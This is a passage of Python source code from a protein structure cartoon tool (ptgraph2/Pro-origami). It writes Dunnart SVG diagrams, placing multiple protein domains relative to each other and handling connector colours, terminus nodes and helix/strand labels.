color_list_str = type_value[1]
color_list = get_color_list(color_list_str)
type_color_dict[typestr] = color_list
if verbose:
sys.stderr.write('"simple" color scheme: ' + str(type_color_dict) + '\n')
return type_color_dict
def get_connector_colors(connector_color_scheme):
"""
Return the RGB color tuples for the colors specified in the
connector_color_scheme, which is in one of the formats:
'all[:<color>]'
'chain[:<color_list>]'
'domain[:<intra_color>,<inter_color>]'
'crossing[:<color_list>]'
The color lists are comma-delimited lists of recognized color names
or RGB colors in hex (e.g. red,purple,#ddf02d).
It is assumed that this function is only called when a color or color_list
actually is present (i.e. the string contains ':' followed by color(s))
and the format has already been validated by parameter parsing (by regexp
in main()).
Parameters:
connector_color_scheme - as specified above
Return value:
list of color value strings (may have length 1 e.g. for 'all')
where the color value strings are 'rrggbbaa' color hex strings (no '#')
where the alpha channel value aa is always 'ff'
Uses globals (Readonly):
COLOR_DICT (color.py) - maps color names to RGB hex strings
Raises exceptions:
KeyError for unknown color names
"""
splitstr = connector_color_scheme.split(':')
scheme = splitstr[0]
color_list_str = splitstr[1]
color_str_list = color_list_str.split(',')
color_list = [ color + 'ff' for color in get_color_list(color_list_str) ]
return color_list
def get_line_color(connector_color_scheme, chain_i):
"""
Utility function used to get connector color based on the user-specified
color scheme
Parameters:
connector_color_scheme - string as specified in get_connector_colors
chain_i - index number of current chain
Return value:
color for this connector in this chain_i
"""
# line color may be overwritten later for multidomain
if connector_color_scheme[:5] == 'chain':
if ':' in connector_color_scheme: # color list specified
line_colors=get_connector_colors(connector_color_scheme)
linecolor = line_colors[chain_i % len(line_colors)]
else: # use builtin default list
linecolor = DUNNART_LINE_COLORS[chain_i % \
len(DUNNART_LINE_COLORS)]
elif connector_color_scheme[:3]=='all':
if ':' in connector_color_scheme: # color list specified
linecolor=get_connector_colors(connector_color_scheme)[0]
else:
linecolor = DUNNART_DEFAULT_LINE_COLOR
elif connector_color_scheme[:6] == 'domain':
if ':' in connector_color_scheme:
linecolor = get_connector_colors(connector_color_scheme)[0]
else:
linecolor = DUNNART_DEFAULT_LINE_COLOR
else: # "crossing" is handled in Dunnart not here, but use first color in
# list for all connectors, crossings to be resolved in Dunnart.
if ':' in connector_color_scheme: # color list specified
linecolor=get_connector_colors(connector_color_scheme)[0]
else:
linecolor = DUNNART_DEFAULT_LINE_COLOR
return linecolor
def write_dunnart_svg_prelude(fh, identifier,
pdbid,
num_domains, total_num_domains,
color_interfering_connectors=False,
connector_color_scheme = None,
use_auto_graph_layout=False):
"""
Write the XML prelude information for the SVG.
Parameters:
fh - filehandle open for writing, to write SVG to.
identifier - string identifier (PDB id, etc) to put in comments
pdbid - PDB id
num_domains - the number of protein domains represented by this file
total_num_domains - number of domains identified in protein
color_interfering_connectors - If True, set flags in SVG to tell
Dunnart to color crossing and shared path
connectors different colors.
Default False.
connector_color_scheme - 'all[:<color>]', 'chain[:<color_list>]',
'domain[:<intra_color>,<inter_color>]',
'crossing[:<color_list>]'
use_auto_graph_layout - If True, set flags in SVG to tell Dunnart
to use automatic graph layout.
Default False.
Return value:
None.
"""
fh.write('<?xml version="1.0" encoding="UTF-8"?>\n')
timestamp = strftime("%d%b%Y %H:%M:%S", localtime())
fh.write("<!-- " + identifier + " -->\n")
fh.write("<!-- " + str(num_domains) + " of " + str(total_num_domains) +
" domain(s) -->\n")
fh.write("<!-- Generated on " + timestamp
+ " by ptgraph2 " + '\n'
+ get_version() + '\n'
+ " ".join(sys.argv) + " -->\n")
fh.write('<!-- http://munk.csse.unimelb.edu.au/pro-origami -->\n')
fh.write('<!-- for use with Dunnart (http://www.csse.monash.edu.au/~mwybrow/dunnart/) -->\n')
fh.write('<svg ' +
'xmlns:dunnart="http://www.csse.monash.edu.au/~mwybrow/dunnart.dtd" ' +
'xmlns:' + PTGRAPH_NS +
'="http://www.csse.unimelb.edu.au/~astivala/proorigami.dtd"' +
'>\n')
# Also write this useful information in XML to be preserved by Dunnart
# so it stays in final version
fh.write('<' + PTGRAPH_NS + ':identification ' + 'pdbId="' + pdbid + '" ' +
'outputFilename="' + identifier + '" ' +
'numberOfDomains="' + str(num_domains) + '" ' +
'totalDomains="' + str(total_num_domains) + '" ' +
'creationTime="' + timestamp + '" ' +
'program="' + 'ptgraph2' + '" ' +
'version="' + get_version() + '" ' +
'commandLine="' + " ".join(sys.argv) + '" ' +
'/>\n')
connector_colors_str = ""
if color_interfering_connectors:
color_conn_str = "1"
if (connector_color_scheme and connector_color_scheme[:9]=="crossing:"):
connector_colors = get_color_list(connector_color_scheme[9:])
connector_colors_str = ' interferingConnectorColours="' + \
reduce(lambda a,b : a + ',' + b, connector_colors) +\
'" '
else:
color_conn_str = "0"
if use_auto_graph_layout:
# FIXME - using this is probably not a good idea, should probably remove
fh.write(' <dunnart:options automaticGraphLayout="1" nonOverlapConstraints="1" pageBoundaryConstraints="1" penaliseCrossings="1" avoidBuffer="8" colourInterferingConnectors="' + color_conn_str + '"' +
connector_colors_str + '/>\n')
else:
fh.write(' <dunnart:options automaticGraphLayout="0" nonOverlapConstraints="1" penaliseCrossings="1" avoidBuffer="10" routingBuffer="4" colourInterferingConnectors="' + color_conn_str + '"' + connector_colors_str + '/>\n')
def write_dunnart_svg_conclusion(fh):
"""
Write the XML conclusion (closing svg element) for the SVG.
Parameters:
fh - filehandle open for writing, to write SVG to.
Return value:
None.
"""
fh.write('</svg>\n')
def find_largest_domain(ptg_list):
"""
Return the 'largest' domain in the list of PTGraph2 objects (each one
representing one domain). 'Largest' is defined as the one with the
largest sheet (as defined by PTGraph2.largest_sheet()). If there is
no PTGraph2 with a sheet, use the one with the largest helix.
There are some alternative definitions of 'largest' that also make
sense, such as the one with the most SSEs, or with the most residues,
but we choose this one as on the diagram (and in 3D), the largest sheet is
what we tend to see as 'central' and orient everything around, which
is what we want here. Note if we choose 'most SSEs' as 'largest', may
end up with a domain with many small helices as largest, which would
probably not be desirable, and 'most residues' may give a domain with
large helices as largest, while we probably would prefer a sheet
to be the 'largest' element, so that's why it is this way.
Parameters:
ptg_list - list of PTGraph2 objects
Return value:
The PTGraph2 object that is largest according to above definition.
"""
max_sheet_size = 0
largest_ptg = None
for ptg in ptg_list:
largest_sheet_id = ptg.largest_sheet()
if largest_sheet_id != None:
sheet_size = ptg.sheet_size(largest_sheet_id)
if sheet_size > max_sheet_size:
max_sheet_size = sheet_size
largest_ptg = ptg
if largest_ptg == None: # no largest sheet, use helices instead
max_helix_size = 0
for ptg in ptg_list:
largest_helix = ptg.largest_helix()
if largest_helix.get_span() > max_helix_size:
max_helix_size = largest_helix.get_span()
largest_ptg = ptg
return largest_ptg
def domain_domain_distance(ptg1, ptg2, pdb_struct, domain_distance_dict):
"""
Return the distance between two domains, which will be defined as
the distance between their two closest SSEs
(using the SSE distance defined in ptdistmatrix.py)
Parameters:
ptg1 - PTGraph2 object for one domain
ptg2 - PTGraph2 object for the other domain
pdb_struct - parsed PDB structure from Bio.PDB
domain_distance_dict (In/Out) - dict { (dom1, dom2) : ret_tuple }
for memoizing domain-domain distances. (dom1,dom2)
is tuple of two PTGraph2 objects, note both (dom1,dom2)
and (dom2,dom1) are always added
and ret_tuple is the return value tuple as defined below.
Return value:
tuple (dist, closest_sse1, closest_sse2, closest_res1, closest_res2)
distance in Angstroms between the two domains, as defined above and
closest_sse1, closest_sse2 are PTNode objects for the closest
SSEs in ptg1 and ptg2 domains respectively and
closest_res1 and closest_res2 are the closest residues in
closest_sse1 and closest_sse2 respectively.
"""
# This function is memoized by the domain_distance_dict parmeter,
# to save recomputations of distances that are previously computed.
if domain_distance_dict.has_key((ptg1, ptg2)):
return domain_distance_dict[(ptg1, ptg2)]
min_dist = float("inf")
closest_sse1 = closest_sse2 = None
closest_res1 = closest_res2 = None
# exclude the terminus nodes
ptg1_sses = [ node for node in ptg1.iter_nodes()
if not isinstance(node, PTNodeTerminus) ]
ptg2_sses = [ node for node in ptg2.iter_nodes()
if not isinstance(node, PTNodeTerminus) ]
for sse1 in ptg1_sses:
for sse2 in ptg2_sses:
(dist, res1, res2) = calc_sse_sse_dist(sse1, sse2, pdb_struct)
if dist < min_dist:
min_dist = dist
closest_sse1 = sse1
closest_sse2 = sse2
closest_res1 = res1
closest_res2 = res2
ret_tuple12 = (min_dist,closest_sse1,closest_sse2,closest_res1,closest_res2)
ret_tuple21 = (min_dist,closest_sse2,closest_sse1,closest_res2,closest_res1)
domain_distance_dict[(ptg1, ptg2)] = ret_tuple12
domain_distance_dict[(ptg2, ptg1)] = ret_tuple21
# if verbose:
# sys.stderr.write('dist between domain ' + ptg1.domainid + ' and ' +
# ptg2.domainid + ' is ' + str(min_dist) + '\n')
return ret_tuple12
def domain_domain_orientation(ptg1, ptg2, pdb_struct):
"""
Return the orientation (tableau code - see pttableau.py) between two
domains. This is defined to be the orientation between the longest
strands in the largest sheets of the two domains (or longest helix
if no sheet).
Parameters:
ptg1 - PTGraph2 object for one domain
ptg2 - PTGraph2 object for the other domain
pdb_struct - parsed PDB structure from Bio.PDB
Return value:
tuple (tabcode, sse1, sse2) where tabcode is the
two-character tableau code (see pttableau.py) of orientation between
the two domains and sse1 and sse2 are the SSEs used for orientation
in ptg1 and ptg2 respectively
"""
sse1 = ptg1.get_orientation_sse()
sse2 = ptg2.get_orientation_sse()
angle = sse1.relative_angle(sse2, pdb_struct)
tabcode = pttableau.angle_to_tabcode(angle)
if verbose:
sys.stderr.write('orientation domain ' + ptg1.domainid + ',' +
ptg2.domainid + '; ' +
' ' + str(sse1) + ',' + str(sse2) + ': ' +
tabcode + '\n')
return (tabcode, sse1, sse2)
def find_nearest_domain(domain_set1, domain_set2, pdb_struct,
domain_distance_dict):
"""
From the PTGraph2 objects in domain_set2, find the one that is
nearest to any of the PTGraph2 objects in domain_set1.
Parameters:
domain_set1 - set of PTGraph2 objects to find nearest to
domain_set2 - set of PTGraph2 objects to find the nearest to any in
domain_set1
pdb_struct - parsed PDB structure from Bio.PDB
domain_distance_dict (In/Out) - dict { (dom1, dom2) : dd_tuple }
for memoizing domain-domain distances. (dom1,dom2)
is tuple of two PTGraph2 objects, note both (dom1,dom2)
and (dom2,dom1) are always added, they are the same.
Return value:
tuple (domain1, domain2, dist_tuple)
where domain1 is from domain_set1 and
domain2 is from domain_set2 and the distance between the two
is the smallest distance between any pair (a,b) with a in domain_set1
and b in domain_set2
and dist_tuple is the (dist,sse1,sse2,res1,res2) tuple as defined
by the return value of domain_domain_distance()
"""
min_dist = float("inf")
closest_domain1 = closest_domain2 = None
closest_dd_tuple = None
for domain1 in domain_set1:
for domain2 in domain_set2:
dd_dist_tuple = domain_domain_distance(domain1, domain2,
pdb_struct,
domain_distance_dict)
dist = dd_dist_tuple[0]
if (dist < min_dist):
min_dist = dist
closest_domain1 = domain1
closest_domain2 = domain2
closest_dd_tuple = dd_dist_tuple
return (closest_domain1, closest_domain2, closest_dd_tuple)
def get_domain_relpos(posdom_sse, curdom_sse,
nearest_ref_resnum, nearest_test_resnum,
tabcode,
positioned_domain, current_domain):
"""
Get the relative position of current_domain relative to positioned_domain
for layout on multidomain cartoon
Parameters:
posdom_sse - PTNode of SSE in positioned domain for placement relative to
curdom_sse - PTNode of SSE in current domain to place relative to posdom
nearest_ref_resnum - residue number in reference SSE that test
element is closest to
nearest_test_resnum - residue number in test SSE that is closest
to reference element
tabcode - two character tableau code for orientation of the two domains
positioned_domain - PTGraph2 of the domain to place curdom relative to
current_domain - PTGraph2 of the domain to place relative to posdom
Return value:
RELPOS_ABOVE/BELOW/etc. for placing current domain relative to
positioned domain.
"""
if isinstance(posdom_sse, PTNodeStrand):
ref_element = posdom_sse.get_sheet_id()
ref_strand = posdom_sse
else:
ref_element = posdom_sse
ref_strand = None
if isinstance(curdom_sse, PTNodeStrand):
test_element = curdom_sse.get_sheet_id()
test_strand = curdom_sse
else:
test_element = curdom_sse
test_strand = None
relpos = positioned_domain.ptrelpos.get_external_relpos(
ref_element,
test_element,
ref_strand,
test_strand,
nearest_ref_resnum,
nearest_test_resnum,
tabcode,
current_domain.sheet_strandlists_dict)
return relpos
def write_dunnart_svg_domains(outfilehandle, outfilename,
ptg_list, pdb_struct,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
interdomain_connectors,
use_scaling,
label_residue_numbers):
"""
Given a list of PTGraph2 objects, one per domain, write them all
to a single SVG file so they are positioned in some sensible way
relative to each other on a single cartoon.
We use a greedy algorithm similar to that used
in positioning sheets etc. in each cartoon, i.e.
1. Position the largest domain.
2. Use the distance map to find closest domain to any already
placed domain
3. position that closest domain relative to the chosen already
placed one, using distance/position maps and tableaux to determine
relative position and orientation
4. repeat from 2 until all domains placed
Note that several fields in PTSVGNodes that are built in each
domain independently are overwritten afterwards by this function
or things it calls for multidomains. These include the xpos and ypos
(moving the domains on the page), helix and strand labels
(since these are numbered from 1 in each domain, and we may have
to change them to be sequential along chains across domains),
helix and strand colors (similarly, color gradient may now go
across domains) and connector colors (for connectors colored by chain,
chains now going across domains).
Parameters:
outfilehandle - open filehandle to write SVG to
outfilename - filename (just for verbose messages)
ptg_list - list of PTGraph2 objects, one per domain
pdb_struct - parsed PDB structure from Bio.PDB
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of separate sequences for strands and helices.
Note that this does not affect internal numbering, it is
just for the labels on Dunnart shapes (not available to
be used with GraphViz either).
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
heuristic_helix_placement - use the original heuristic helix placement
instead of trying to place helices according to distance
matrix information.
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
enable_sheet_gap_rule - If True and using heuristic helix placement,
don't put 'too long' helices between sheets that are
neighbours.
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
connector_color_scheme - 'all','chain','domain','crossing' (see main)
color_scheme - 'none', 'simple', 'gradient', 'sheet', 'fold' (see main)
helix_proximity_shading_colors - If not None & using helix clustering,
shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
interdomain_connectors - make connectors between domains rather
than using pseudo-terminus nodes as normally used
(such as when one domain per file).
use_scaling - if True, use scaling as a primitive way to avoid overlaps
before dunnart processing to help avoid crashes in dunnart
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Return value:
None
"""
initial_xmlid = 1 #start XML identifiers at 1
# store above,below,left,right neighbour domain of each domain, so we
# can avoid collisions
domain_posmap = PTPosMap()
# dict { (dom1, dom2) : dist_tuple }
# for memoizing domain-domain distances. (dom1,dom2)
# is tuple of two PTGraph2 objects, note both (dom1,dom2)
# and (dom2,dom1) are always added, they are the same.
# dist_tuple is defined by return value of domain_domain_distance()
domain_distance_dict = {}
# build svg for the largest domain as starting point
largest_domain = find_largest_domain(ptg_list)
current_domain = largest_domain
build_one_dunnart_svg_domain(largest_domain, outfilename,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
False, # main_sideways
False, # main_reversed
interdomain_connectors,
use_scaling,
label_residue_numbers)
# ensure all XML identifiers are distinct across domains
initial_xmlid = largest_domain.xmlid_generator.next()
# build set of positioned and unpositioned domains.
positioned_domains = Set([largest_domain])
unpositioned_domains = Set(ptg_list) - positioned_domains
while len(unpositioned_domains) > 0:
(positioned_domain, current_domain, dd_tuple) = \
find_nearest_domain(positioned_domains,
unpositioned_domains,
pdb_struct,
domain_distance_dict)
# (dist, posdom_sse, curdom_sse, posdom_res, curdom_res) = dd_tuple
if verbose:
sys.stderr.write('positioning domain ' + current_domain.domainid +
' relative to domain ' + positioned_domain.domainid
+ '\n')
# sys.stderr.write(' ref is ' + str(posdom_sse) + ', test is ' +
# str(curdom_sse) + '\n')
(tabcode, sse1, sse2) = domain_domain_orientation(positioned_domain,
current_domain,
pdb_struct)
# Use orientation SSEs for relative position as well
posdom_sse = sse1
curdom_sse = sse2
(dist, posdom_res, curdom_res) = calc_sse_sse_dist(posdom_sse,
curdom_sse,
pdb_struct)
(main_sideways, main_reversed) = resolve_orientation(
tabcode, sse1, sse2)
posdom_resnum = biopdbresid_to_pdbresseq(posdom_res.get_id())
curdom_resnum = biopdbresid_to_pdbresseq(curdom_res.get_id())
relpos = get_domain_relpos(posdom_sse, curdom_sse,
posdom_resnum, curdom_resnum,
tabcode,
positioned_domain, current_domain)
if verbose:
sys.stderr.write('positioning domain ' +
current_domain.domainid +
' ' + ptrelpos_to_str(relpos) +
' ' + positioned_domain.domainid +
'\n')
# avoid collisions between domains by checking in the posmap and
# positioning relative to the domain we would have collided with
# instead
if domain_posmap.has_key(positioned_domain):
domain_neighbours = domain_posmap[positioned_domain]
neighbour = domain_neighbours.get_neighbour(relpos)
if neighbour != None:
if verbose:
sys.stderr.write(' domain position: cannot place domain ' +
current_domain.domainid + ' ' +
ptrelpos_to_str(relpos) + ' ' +
positioned_domain.domainid +
' (occupied by ' +
neighbour.domainid + ')\n')
positioned_domain = neighbour
if verbose:
sys.stderr.write(' positioning domain ' +
current_domain.domainid +
' relative to domain ' +
positioned_domain.domainid
+ '\n')
(tabcode, sse1, sse2) = \
domain_domain_orientation(positioned_domain,
current_domain,
pdb_struct)
# Use orientation SSEs for relative position as well
posdom_sse = sse1
curdom_sse = sse2
(dist, posdom_res, curdom_res) = calc_sse_sse_dist(posdom_sse,
curdom_sse,
pdb_struct)
(main_sideways, main_reversed) = \
resolve_orientation(tabcode, sse1, sse2)
posdom_resnum = biopdbresid_to_pdbresseq(posdom_res.get_id())
curdom_resnum = biopdbresid_to_pdbresseq(curdom_res.get_id())
relpos = get_domain_relpos(posdom_sse, curdom_sse,
posdom_resnum, curdom_resnum,
tabcode,
positioned_domain, current_domain)
domain_neighbours = domain_posmap[positioned_domain]
neighbour = domain_neighbours.get_neighbour(relpos)
if neighbour != None:
# still a collision.
# FIXME: arbitrary domain positioning here
if (domain_neighbours.west == None):
relpos = RELPOS_LEFT
elif (domain_neighbours.east == None):
relpos = RELPOS_RIGHT
elif (domain_neighbours.north == None):
relpos = RELPOS_ABOVE
elif (domain_neighbours.south == None):
relpos = RELPOS_BELOW
else:
sys.stderr.write('WARNING: nowhere to'+
' place domain ' +
current_domain.domainid +
' relative to domain ' +
positioned_domain.domainid +
'\n')
if verbose:
sys.stderr.write(' (collision): ' +
'positioning domain ' +
current_domain.domainid + ' ' +
ptrelpos_to_str(relpos) +
' domain ' +
positioned_domain.domainid +
'\n')
# Build SVG objects with graph and constraints for Dunnart
build_one_dunnart_svg_domain(current_domain, outfilename,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
main_sideways,
main_reversed,
interdomain_connectors,
use_scaling,
label_residue_numbers)
# ensure all XML identifiers are distinct across domains
initial_xmlid = current_domain.xmlid_generator.next()
# to position each domain, we find its relative position to the
# already positioned domain, and translate it so it is outside
# and in the correct relative position to the bounding box of
# the positioned one
positioned_bbox = positioned_domain.get_bounding_box()
# first move the current domain to same position as positioned domain
current_domain.translate_relative_bbox(positioned_bbox, None)
# then move it left/right/up/down relative to the positioned domain
current_domain.translate_relative_bbox(positioned_bbox, relpos)
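        # e.g. a relpos of RELPOS_LEFT shifts the current domain just past the
        # left edge of positioned_bbox, so the two domains' bounding boxes end
        # up side by side rather than overlapping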
domain_posmap.add_neighbour_obj(positioned_domain, current_domain,
relpos)
unpositioned_domains.remove(current_domain)
positioned_domains.add(current_domain)
# END while len(unpositioned_domains) > 0
# ensure we keep unique XML ids for any SVG objects we have to add
xmlid_generator = GenSeqId(current_domain.xmlid_generator.next())
# convert any pseudo terminus nodes to real terminus nodes if there
# are in fact no SSEs continuing that chain in another domain
# (FIXME: should fix build_graph_from_secstruct() so this doesn't happen
# in the first place but that is quite difficult as it currently stands)
interdomain_connector_list = []
if interdomain_connectors:
interdomain_connector_list = fixup_terminus_nodes(
list(positioned_domains),
xmlid_generator,
use_connector_arrowheads)
# relabel helices and strands so not restarting in each domain
# Note: also redoes coloring for color gradient color scheme
keep_domain_numbering = False # TODO: make this an option
if not keep_domain_numbering:
relabel_nodes_multidomain(list(positioned_domains),
sse_label_scheme,
color_scheme)
redo_sseseqnum_nodes_multidomain(list(positioned_domains))
# build the connectors between domains
if interdomain_connectors and len(positioned_domains) > 1:
interdomain_connector_list += build_interdomain_connectors(ptg_list,
xmlid_generator,
use_connector_arrowheads,
connector_color_scheme)
for connector in interdomain_connector_list:
connector.build_resname_sequence(ptg_list[0].residue_list,
ptg_list[0].pdb_resid_dict)
# For the 'chain' connector color scheme, redo the color of all connectors
# so that each chain has a different connector color
if connector_color_scheme[:5] == 'chain':
recolor_connectors_chain(ptg_list, interdomain_connector_list,
connector_color_scheme)
# Now write out all the SVG (order doesn't matter)
for ptg in positioned_domains:
ptg.write_dunnart_svg(outfilehandle)
if interdomain_connector_list:
for conn in interdomain_connector_list:
conn.write_svg(outfilehandle)
def fixup_terminus_nodes(ptg_list, xmlid_generator,
use_connector_arrowheads):
"""
convert any pseudo terminus nodes to real terminus nodes if there
are in fact no SSEs continuing that chain in another domain
(FIXME: should fix build_graph_from_secstruct() so this doesn't happen
in the first place but that is quite difficult as it currently stands)
Parameters:
ptg_list - list of PTGraph2 objects one per domain
xmlid_generator (IN/OUT) - GenSeqId object for generating XML ids
                                   must be initialized to start at the
next unused XML id.
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
Return value:
       list of PTSVGConnector objects for connectors added to terminus nodes
"""
conn_list = []
    pseudoterm_list = [] # list of (node, ptg, chain) pseudo terminus nodes
# and the PTGraph2 to which it belongs, to convert
# to real terminus node
for i in range(len(ptg_list)):
ptg1 = ptg_list[i]
for chain1 in ptg1.iter_chains():
for termnode in [ chain1[0], chain1[-1] ]: # N and C terminus
if termnode.get_pseudo():
found_chain_other_domain = False
# print 'ccc checking',termnode
for j in range(len(ptg_list)):
ptg2 = ptg_list[j]
if ptg1 == ptg2:
continue
for chain2 in ptg2.iter_chains():
if (termnode.get_chainid() == chain2[0].get_chainid()
and ( (termnode.get_termtype() == 'C' and
get_int_icode(
chain2[0].get_start_res_seq())[0] >
get_int_icode(
termnode.get_end_res_seq())[0] - 2) or
(termnode.get_termtype() == 'N' and
get_int_icode(
chain2[-1].get_end_res_seq())[0] <
get_int_icode(
termnode.get_start_res_seq())[0] + 2) ) ):
# NB can be +-2 as +-1 'fake' resnum
found_chain_other_domain = True
# print 'bbb found chain in domain',ptg2.domainid,'for',termnode
break
if not found_chain_other_domain:
pseudoterm_list.append((termnode, ptg1, chain1))
for (pseudoterm, ptg, chain) in pseudoterm_list:
        # this chain has no continuation in another domain, so convert
# pseudo terminus node to a real terminus node, which involves
# positioning it
# print 'aaaa',pseudoterm
(xpos, ypos) = ptg.find_terminus_pos(pseudoterm, chain)
label = pseudoterm.get_termtype() +\
pseudoterm.get_chainid().lower()
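        # e.g. a C pseudo-terminus on chain A becomes a real terminus node
        # labelled 'Ca'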
pseudoterm.set_is_positioned(True)
pseudoterm.set_pseudo(False)
xmlid = xmlid_generator.next()
pseudoterm.set_svginfo(xmlid, xpos, ypos, label)
# now add connector from last SSE in the chain to the new terminus node
if pseudoterm.get_termtype() == 'C':
to_node = pseudoterm
from_node = ptg.get_most_cterm_visible_sse(chain)
# print 'ppp',from_node
srcFlags = from_node.get_empty_port()
dstFlags = DUNNART_DEFAULT_PORT
else: # 'N'
to_node = ptg.get_most_nterm_visible_sse(chain)
from_node = pseudoterm
# print 'ppp2',to_node
srcFlags = DUNNART_DEFAULT_PORT
dstFlags = to_node.get_empty_port()
linecolor = DUNNART_DEFAULT_LINE_COLOR
# linecolor may be overwritten later (e.g. for line color by chain)
xmlid = xmlid_generator.next()
conn_list.append(PTSVGConnector(xmlid,
from_node, to_node,
srcFlags, dstFlags,
linecolor,
use_connector_arrowheads))
return conn_list
def redo_sseseqnum_nodes_multidomain(ptg_list):
"""
Redo the sseseqnums on the helices and strands for multidomain
layout so that the sequential numbers are no longer restarting in
each domain. (Same as the 'sequential' labelling scheme).
Parameters:
ptg_list - list of PTGraph2 objects, one for each domain
Return value:
None
Raises exceptions:
TypeError if get other than PTSVGNodeHelix or PTSVGNodeStrand
from iter_helices() and iter_strands()
"""
# build a list of all visible helices and strands
# (note: not terminus nodes) in all domains, sorted by chain id
# and within chainid by residue sequence number (ascending)
nodelist = []
for ptg in ptg_list:
nodelist += list(ptg.iter_helices()) # skips 3/5 if not selected
nodelist += list(ptg.iter_strands())
nodelist.sort() # depends on PTNode comparison operators
# just label helices and strands in same sequence from 1,
# not restarting at chains
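    # e.g. two domains with three and four visible SSEs end up with sseseqnums
    # '1'..'7' in residue order across both domains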
seqnum = 1
for node in nodelist:
node.sseseqnum = str(seqnum)
seqnum += 1
def relabel_nodes_multidomain(ptg_list, sse_label_scheme,
color_scheme):
"""
Relabel the helices and strands for multidomain layout so that
the labels are no longer restarting in each domain.
If the color scheme is the 'gradient' color scheme, then the
node colors are also redone so color gradient does not restart
in each domain.
Parameters:
ptg_list - list of PTGraph2 objects, one for each domain
sse_label_scheme - if 'sequential' number all nodes in one sequence
                   instead of separate sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes (not available to
be used with GraphViz either).
color_scheme - 'none', 'simple', 'gradient', 'sheet', 'fold'
Return value:
None
Raises exceptions:
TypeError if get other than PTSVGNodeHelix or PTSVGNodeStrand
from iter_helices() and iter_strands()
"""
# build a list of all visible helices and strands
# (note: not terminus nodes) in all domains, sorted by chain id
# and within chainid by residue sequence number (ascending)
nodelist = []
for ptg in ptg_list:
nodelist += list(ptg.iter_helices()) # skips 3/5 if not selected
nodelist += list(ptg.iter_strands())
nodelist.sort() # depends on PTNode comparison operators
if sse_label_scheme == 'sequential':
# just label helices and strands in same sequence from 1,
# not restarting at chains
seqnum = 1
for node in nodelist:
node.label = str(seqnum)
if isinstance(node, PTNodeStrand) and node.get_barrel_edge():
node.label += '*' # TODO better way to mark barrel edges
seqnum += 1
elif sse_label_scheme == 'separate':
# label strands from 1, not restarting at each chain
# label helices A,B,etc. not restarting at each chain
# put lowercase chainid as suffix on each if multiple chains
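        # e.g. with more than one chain, the third strand on chain B is
        # labelled '3b', the second helix 'Bb', and real terminus nodes 'Nb'/'Cb'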
multiple_chains = False
chainid_dict = {} # dict of {chainid:True} to find distinct chainids
for ptg in ptg_list:
if ptg.num_chains() > 1:
multiple_chains = True
break
else:
chainid = list(ptg.iter_chains())[0][0].get_chainid()
if not chainid_dict.has_key(chainid):
chainid_dict[chainid] = True
if not multiple_chains and len(chainid_dict) > 1:
multiple_chains = True
strand_num = 1
helix_num = 1
for node in nodelist:
if isinstance(node, PTSVGNodeStrand):
label = str(strand_num)
if node.get_barrel_edge():
label += '*' # TODO better way to mark barrel edges
strand_num += 1
elif isinstance(node, PTSVGNodeHelix):
# helices are labelled 'A', 'B', etc. by convention
# FIXME: should go to AA, AB, etc. if more than 26
label = chr(ord('A')-1 + helix_num)
helix_num += 1
else:
raise TypeError('unhandled node type')
if multiple_chains:
label = label + str(node.get_chainid()).lower()
node.label = label
# if multiple chains, put chain suffix on N and C term nodes also
if multiple_chains:
for ptg in ptg_list:
for chain in ptg.iter_chains():
assert(chain[0].get_termtype() == 'N')
assert(chain[-1].get_termtype() == 'C')
if not chain[0].get_pseudo():
chain[0].label = 'N' + chain[0].get_chainid().lower()
if not chain[-1].get_pseudo():
chain[-1].label = 'C' + chain[-1].get_chainid().lower()
else: # label scheme is 'none'
label = ''
# Also redo the node colors, from blue to red along whole protein
# (across domains and chains)
# FIXME: this is not consistent with single domain mode, where
    # color restarts for each chain - should change one or the other
# to be consistent (probably this way, ie not restarting at each chain,
# is best, as it is what PyMOL does?)
if color_scheme == 'gradient':
rgb_list = list(color_gradient(len(nodelist)))
assert(len(rgb_list) == len(nodelist))
for i in range(len(nodelist)):
nodelist[i].set_color(rgb_list[i])
# color each terminus node the same color as its visible neighbour
for ptg in ptg_list:
for chain in ptg.iter_chains():
nterm = chain[0]
cterm = chain[-1]
assert(nterm.get_termtype() == 'N')
assert(cterm.get_termtype() == 'C')
nterm.set_color(
ptg.get_most_nterm_visible_sse(chain).get_color())
cterm.set_color(
ptg.get_most_cterm_visible_sse(chain).get_color())
def build_interdomain_connectors(ptg_list,
xmlid_generator,
use_connector_arrowheads,
connector_color_scheme):
"""
Build connectors between domains in a multidomain cartoon.
For each pair of domains, we need to go through each pair of chains
(one from each domain), and for chains that are split between the
domains (i.e. the same chainid is in both domains) which will have
a pseudo-terminus that has not been drawn, then make a connector
from the most N-terminal SSE in the one domain to the most C-terminal
SSE in the other domain.
Parameters:
ptg_list - list of PTGraph2 objects, one per domain
xmlid_generator (IN/OUT) - GenSeqId object for generating XML ids
                                   must be initialized to start at the
next unused XML id.
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
connector_color_scheme - 'all[:<color>]', 'chain[:<color_list>]',
'domain[:<intra_color>,<inter_color>]',
'crossing[:<color_list>]'
Return value:
List of PTSVGConnector objects from interdomain connectors
"""
# FIXME this is all rather inefficient and inelegant, should probably
# do this better by marking things in build_graph_from_secstruct()
# or in relabel_nodes_multidomain()
